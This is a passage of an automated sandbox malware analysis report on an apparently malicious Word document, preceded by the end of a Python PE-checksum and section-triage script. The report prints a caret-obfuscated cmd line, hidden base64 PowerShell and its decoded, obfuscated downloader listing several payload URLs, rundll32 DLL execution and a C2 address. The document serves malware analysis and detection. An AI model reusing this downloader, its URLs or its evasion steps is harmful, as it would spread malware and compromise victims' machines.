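        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:                               # fold carries back in
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def checksum_is_valid(data):
    return stored_checksum(data) == pe_checksum(data)


def section_names(data):
    pe = _pe_offset(data)
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    table = pe + 24 + opt_size                             # IMAGE_SECTION_HEADER[] start
    names = []
    for i in range(nsections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def non_standard_sections(data):
    return [n for n in section_names(data) if n not in STANDARD_SECTIONS]


def build_sample_pe(sections, checksum=0):
    """Constructed header-only PE32 image (no section data) for offline testing."""
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)              # CheckSum field
    table = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    img = build_sample_pe([".text", ".text4", ".text8", ".rdata"])
    print("stored 0x%x computed 0x%x valid=%s" % (stored_checksum(img), pe_checksum(img),
                                                   checksum_is_valid(img)))
    print("non-standard sections:", non_standard_sections(img))
```

Against a real sample, pass the file bytes to pe_checksum and compare with stored_checksum; a mismatch on a DLL that claims to be a release build is a useful triage signal, although a zero CheckSum is common for unsigned binaries and alone proves nothing.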
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000100B push ss; iretd 7_2_1000100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0014EED0 push edx; ret 7_2_0014EFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00133868 push ebp; ret 7_2_00133878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0013134B push 68244072h; iretd 7_2_00131350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001313BB push ss; iretd 7_2_001313C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001353F7 push 00000072h; retf 7_2_001353FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0013146C pushad ; iretd 7_2_0013146D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0016EED0 push edx; ret 8_2_0016EFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00153868 push ebp; ret 8_2_00153878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0015134B push 68244072h; iretd 8_2_00151350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001513BB push ss; iretd 8_2_001513C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001553F7 push 00000072h; retf 8_2_001553FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0015146C pushad ; iretd 8_2_0015146D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018EED0 push edx; ret 9_2_0018EFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00173868 push ebp; ret 9_2_00173878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017134B push 68244072h; iretd 9_2_00171350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001713BB push ss; iretd 9_2_001713C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001753F7 push 00000072h; retf 9_2_001753FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017146C pushad ; iretd 9_2_0017146D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001AEED0 push edx; ret 10_2_001AEFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00193868 push ebp; ret 10_2_00193878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0019134B push 68244072h; iretd 10_2_00191350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001913BB push ss; iretd 10_2_001913C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001953F7 push 00000072h; retf 10_2_001953FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0019146C pushad ; iretd 10_2_0019146D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CEED0 push edx; ret 11_2_001CEFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B3868 push ebp; ret 11_2_001B3878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B134B push 68244072h; iretd 11_2_001B1350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B13BB push ss; iretd 11_2_001B13C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B53F7 push 00000072h; retf 11_2_001B53FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B146C pushad ; iretd 11_2_001B146D

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (56 identical entries)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2400 Thread sleep time: -922337203685477s >= -30000s
Note: 922337203685477 is 2^63 hundred-nanosecond ticks expressed in milliseconds, i.e. the encoding of an INFINITE timeout: the thread is parked indefinitely rather than for a tuned interval, so this entry on its own is not evidence of a deliberately timed sleep.
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2094267927.0000000000284000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003278 mov eax, dword ptr fs:[00000030h] 7_2_10003278
Note: in a 32-bit process fs:[30h] is the TEB field that points to the PEB, whose BeingDebugged and NtGlobalFlag members are the usual targets of an inline debugger check; the read happens in the payload mapped into the SysWOW64 rundll32.exe.
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.55.186.229 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded sET-iTem vARIABle:4PuW ([TypE]("{0}{2}{4}{1}{3}" -f 'S','rect','YsT','ory','em.io.di')) ; sET-iteM variABle:3Wv ( [tYPe]("{4}{2}{5}{1}{0}{7}{3}{6}"-F 'Vic','SeR','TEM','A','Sys','.net.','nager','epOInTm') ) ;$Xlzio9j=$P85R + [char](33) + $Q68I;$L29H=(('K'+'07')+'Z'); ( VariAbLe 4PUw -ValUeoNl )::"C`REateDirEctO`Ry"($HOME + ((('uq'+'2Nd')+'cz'+('q'+'ybu')+('q'+'2H'+'af0_yn')+('uq'+'2')) -rEplaCe('u'+'q2'),[ChAR]92));$J73Y=(('K'+'46')+'V'); ( ITEm VaRiAble:3Wv).VALUe::"S`eC`URI`TyproTOcOL" = ('Tl'+('s1'+'2'));$E3_O=(('R'+'77')+'A');$Ifws2qi = ('P4'+'4G');$X31J=('B'+('5'+'8R'));$Rzmnpqs=$HOME+(('{'+'0}Ndczq'+'yb{0}H'+('a'+'f0')+'_yn{'+'0'+'}') -F [ChaR]92)+$Ifws2qi+'.d' + 'll';$B65A=('H'+('_'+'0X'));$Pzpxt0n='h' + 'tt' + 'p';$L5brdwf=(('x'+' [ sh '+'b:')+'//'+'m'+'i'+'cr'+'o'+'ne'+'ws'+'.'+'e'+('u/'+'c'+'ranksh')+'af'+('t-'+'pulley'+'-i5a'+'io/Tlp/')+'!x'+(' [ s'+'h ')+'b'+':'+'/'+('/o'+'fe')+('rt-'+'a'+'l.c')+'om'+'/'+'wp'+'-c'+('ontent'+'/'+'t'+'9hV')+'Vi'+'B'+('de/!'+'x [')+' s'+('h b://'+'tr'+'a'+'nsal')+('.'+'eu/')+'ne'+('tg'+'ear')+('-wi'+'f')+('i-q'+'zvv')+('4/1j7'+'X')+('Z'+'/!x ')+'['+(' '+'s'+'h b:/'+'/e-')+('wde'+'s'+'ign.e'+'u/w')+('oo'+'d-'+'stov')+'e-'+('x7'+'iww/R'+'1SMs1v/')+'!x'+(' '+'[ s')+('h'+' b')+':'+('//'+'r')+('el'+'ated'+'grou')+'pt'+'e'+'s'+('t.c'+'om')+('/'+'Ou')+'r'+('Ti'+'me/cule'+'TF')+('a'+'3v')+'/'+('!'+'x [ ')+('sh bs'+':')+'/'+('/ww'+'w.s')+('ch'+'m')+('uckfe'+'der'+'n')+('.i'+'n')+'f'+'o'+('/'+'refe'+'r')+'en'+('ce'+'/0H')+('lB
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded sET-iTem vARIABle:4PuW ([TypE]("{0}{2}{4}{1}{3}" -f 'S','rect','YsT','ory','em.io.di')) ; sET-iteM variABle:3Wv ( [tYPe]("{4}{2}{5}{1}{0}{7}{3}{6}"-F 'Vic','SeR','TEM','A','Sys','.net.','nager','epOInTm') ) ;$Xlzio9j=$P85R + [char](33) + $Q68I;$L29H=(('K'+'07')+'Z'); ( VariAbLe 4PUw -ValUeoNl )::"C`REateDirEctO`Ry"($HOME + ((('uq'+'2Nd')+'cz'+('q'+'ybu')+('q'+'2H'+'af0_yn')+('uq'+'2')) -rEplaCe('u'+'q2'),[ChAR]92));$J73Y=(('K'+'46')+'V'); ( ITEm VaRiAble:3Wv).VALUe::"S`eC`URI`TyproTOcOL" = ('Tl'+('s1'+'2'));$E3_O=(('R'+'77')+'A');$Ifws2qi = ('P4'+'4G');$X31J=('B'+('5'+'8R'));$Rzmnpqs=$HOME+(('{'+'0}Ndczq'+'yb{0}H'+('a'+'f0')+'_yn{'+'0'+'}') -F [ChaR]92)+$Ifws2qi+'.d' + 'll';$B65A=('H'+('_'+'0X'));$Pzpxt0n='h' + 'tt' + 'p';$L5brdwf=(('x'+' [ sh '+'b:')+'//'+'m'+'i'+'cr'+'o'+'ne'+'ws'+'.'+'e'+('u/'+'c'+'ranksh')+'af'+('t-'+'pulley'+'-i5a'+'io/Tlp/')+'!x'+(' [ s'+'h ')+'b'+':'+'/'+('/o'+'fe')+('rt-'+'a'+'l.c')+'om'+'/'+'wp'+'-c'+('ontent'+'/'+'t'+'9hV')+'Vi'+'B'+('de/!'+'x [')+' s'+('h b://'+'tr'+'a'+'nsal')+('.'+'eu/')+'ne'+('tg'+'ear')+('-wi'+'f')+('i-q'+'zvv')+('4/1j7'+'X')+('Z'+'/!x ')+'['+(' '+'s'+'h b:/'+'/e-')+('wde'+'s'+'ign.e'+'u/w')+('oo'+'d-'+'stov')+'e-'+('x7'+'iww/R'+'1SMs1v/')+'!x'+(' '+'[ s')+('h'+' b')+':'+('//'+'r')+('el'+'ated'+'grou')+'pt'+'e'+'s'+('t.c'+'om')+('/'+'Ou')+'r'+('Ti'+'me/cule'+'TF')+('a'+'3v')+'/'+('!'+'x [ ')+('sh bs'+':')+'/'+('/ww'+'w.s')+('ch'+'m')+('uckfe'+'der'+'n')+('.i'+'n')+'f'+'o'+('/'+'refe'+'r')+'en'+('ce'+'/0H')+('lB
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ndczqyb\Haf0_yn\P44G.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',YWTgmybfjbBtvDQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wkjjpdqip\vecwkqdb.lyo',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',ItLugJX
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivhpdalyytfvzo\hoseqdxoqcmcr.kuc',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',IJPmPuzefT
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zzarwsk\ykbqlw.ztp',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',PUIhDyBaYh
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rrhzxvbsppptipx\fklicvcyvxpinr.seu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',MWkJrCwEVqm
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pkxqfqnqq\heurasqx.kyn',#1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc cwBFAFQALQBpAFQAZQBtACAAIAB2AEEAUgBJAEEAQgBsAGUAOgA0AFAAdQBXACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTACcALAAnAHIAZQBjAHQAJwAsACcAWQBzAFQAJwAsACcAbwByAHkAJwAsACcAZQBtAC4AaQBvAC4AZABpACcAKQApACAAIAA7ACAAIABzAEUAVAAtAGkAdABlAE0AIAB2AGEAcgBpAEEAQgBsAGUAOgAzAFcAdgAgACAAKAAgAFsAdABZAFAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADEAfQB7ADAAfQB7ADcAfQB7ADMAfQB7ADYAfQAiAC0ARgAgACcAVgBpAGMAJwAsACcAUwBlAFIAJwAsACcAVABFAE0AJwAsACcAQQAnACwAJwBTAHkAcwAnACwAJwAuAG4AZQB0AC4AJwAsACcAbgBhAGcAZQByACcALAAnAGUAcABPAEkAbgBUAG0AJwApACAAKQAgADsAJABYAGwAegBpAG8AOQBqAD0AJABQADgANQBSACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABRADYAOABJADsAJABMADIAOQBIAD0AKAAoACcASwAnACsAJwAwADcAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAYQByAGkAQQBiAEwAZQAgACAANABQAFUAdwAgACAALQBWAGEAbABVAGUAbwBOAGwAIAAgACkAOgA6ACIAQwBgAFIARQBhAHQAZQBEAGkAcgBFAGMAdABPAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwB1AHEAJwArACcAMgBOAGQAJwApACsAJwBjAHoAJwArACgAJwBxACcAKwAnAHkAYgB1ACcAKQArACgAJwBxACcAKwAnADIASAAnACsAJwBhAGYAMABfAHkAbgAnACkAKwAoACcAdQBxACcAKwAnADIAJwApACkAIAAtAHIARQBwAGwAYQBDAGUAKAAnAHUAJwArACcAcQAyACcAKQAsAFsAQwBoAEEAUgBdADkAMgApACkAOwAkAEoANwAzAFkAPQAoACgAJwBLACcAKwAnADQAN